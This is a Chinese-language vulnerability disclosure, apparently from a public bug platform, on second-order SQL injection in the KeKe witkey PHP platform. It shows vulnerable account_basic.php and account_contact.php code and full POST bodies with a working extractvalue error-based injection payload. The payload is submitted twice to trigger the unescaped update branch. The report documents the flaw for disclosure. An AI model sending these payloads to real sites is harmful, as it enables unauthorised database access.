### 简要描述: 二次注入。 ### 详细说明: #1 /www/control/user/account_basic.php ``` ..... $arrMemberExts = kekezu::get_table_data ( "*", "witkey_member_ext", " type='sect' and uid= ".$gUid, "", "", "", "k" ); ........ if ($sect) { foreach ( $sect as $k => $v ) { if ($arrMemberExts [$k]) db_factory::execute ( sprintf ( " update %switkey_member_ext set v1='%s' where k='%s' and uid='%d'", TABLEPRE, $v, $k, $gUid ) ); else { $ext_obj = new Keke_witkey_member_ext_class (); $ext_obj->setK ( $k ); $ext_obj->setV1 ( kekezu::escape ( $v ) ); $ext_obj->setUid ( $gUid ); $ext_obj->setType ( 'sect' ); $ext_obj->create_keke_witkey_member_ext (); } } } ``` 跟到create_keke_witkey_member_ext() ``` function create_keke_witkey_member_ext(){ $data = array(); if(!is_null($this->_ext_id)){ $data['ext_id']=$this->_ext_id; } if(!is_null($this->_uid)){ $data['uid']=$this->_uid; } if(!is_null($this->_k)){ $data['k']=$this->_k; } if(!is_null($this->_v1)){ $data['v1']=$this->_v1; } if(!is_null($this->_v2)){ $data['v2']=$this->_v2; } if(!is_null($this->_v3)){ $data['v3']=$this->_v3; } if(!is_null($this->_v4)){ $data['v4']=$this->_v4; } if(!is_null($this->_v5)){ $data['v5']=$this->_v5; } if(!is_null($this->_type)){ $data['type']=$this->_type; } return $this->_ext_id = $this->_db->inserttable($this->_tablename,$data,1,$this->_replace); } ``` 对于 post 传入的 sect 数组，先判断其键是否已存在于 $arrMemberExts（从数据库读出的该用户已有记录）中，存在则 update，不存在就 insert。问题在于两个分支的处理并不一致：insert 分支对 $v 做了 kekezu::escape，而 update 分支把 $v 和 $k 直接 sprintf 进 SQL 字符串，没有任何转义。于是，如果我们先提交 sect[1'] 会 insert values('1\'')，再重复提交一次的话，这个键已经存在，就会进入 update 分支，单引号就原样带进 SQL 了。 注册一个用户后，向 index.php?do=user&view=account&op=basic 连续 post 两次以下数据: ``` formhash=00a201&pk%5Buid%5D=10&is_perfect=1&indus_pid=-1&indus_id=-1&truename=%E5%98%89%E5%AE%A2&sex=-1&birthday=2015-09-09&email=a%**.**.**.**§%5Bemail%5D=1&mobile=18615478859§%5B1'and extractvalue(1,concat(0x5c,user()))#%5D=12222&qq=123213213§%5Bqq%5D=1&msn=§%5Bmsn%5D=1&phone=§%5Bphone%5D=1&province=p&city=c&area=a ``` [<img src="https://images.seebug.org/upload/201509/1701105846350b0495065cfdd23a6f402b920fee.png" alt="11.png" width="600" 
onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/1701105846350b0495065cfdd23a6f402b920fee.png) #2 /www/control/user/account_contact.php ``` if($gUserInfo['city']){ $arrCity = CommonClass::getDistrictByPid($gUserInfo['province'],'id,upid,name'); } if($gUserInfo['area']){ $arrArea = CommonClass::getDistrictByPid($gUserInfo['city'],'id,upid,name'); } if (isset($formhash)&&kekezu::submitcheck($formhash)) { if($gUserInfo['uid'] != $pk['uid']){ kekezu::show_msg('无权操作',NULL,NULL,NULL,'error'); return false; } $arrData =array( 'email'=>$email, 'mobile'=>$mobile, 'qq'=>$qq, 'msn'=>$msn, 'phone'=>$phone, 'province'=>$province, 'city'=>$city, 'area'=>$area ); $intRes = $objSpaceT->save($arrData,$pk); if ($sect) { foreach ( $sect as $k => $v ) { if ($arrMemberExts [$k]) db_factory::execute ( sprintf ( " update %switkey_member_ext set v1='%s' where k='%s' and uid='%d'", TABLEPRE, $v, $k, $gUid ) ); else { $ext_obj = new Keke_witkey_member_ext_class (); $ext_obj->setK ( $k ); $ext_obj->setV1 ( kekezu::escape ( $v ) ); $ext_obj->setUid ( $gUid ); $ext_obj->setType ( 'sect' ); $ext_obj->create_keke_witkey_member_ext (); } } ``` 这里对 sect 数组的处理逻辑与 #1 完全相同（update 分支同样未做转义），只要通过前面的 formhash 校验、且 pk[uid] 与当前登录用户的 uid 一致，即可注入。 /index.php?do=user&view=account&op=contact post 以下数据: ``` formhash=01b251&pk%5Buid%5D=10&is_perfect=1&indus_pid=-1&indus_id=-1&truename=%E5%98%89%E5%AE%A2&sex=-1&birthday=2015-09-09&email=a%**.**.**.**§%5Bemail%5D=1&mobile=18615478859§%5B1'and extractvalue(1,concat(0x5c,user()))#%5D=12222&qq=123213213§%5Bqq%5D=1&msn=§%5Bmsn%5D=1&phone=§%5Bphone%5D=1&province=p&city=c&area=a ``` [<img src="https://images.seebug.org/upload/201509/17011416e2743f2874cc1966f8b5605b8f0cd470.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/17011416e2743f2874cc1966f8b5605b8f0cd470.png) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201509/17011416e2743f2874cc1966f8b5605b8f0cd470.png" alt="11.png" width="600" 
onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/17011416e2743f2874cc1966f8b5605b8f0cd470.png) [<img src="https://images.seebug.org/upload/201509/1701105846350b0495065cfdd23a6f402b920fee.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/1701105846350b0495065cfdd23a6f402b920fee.png)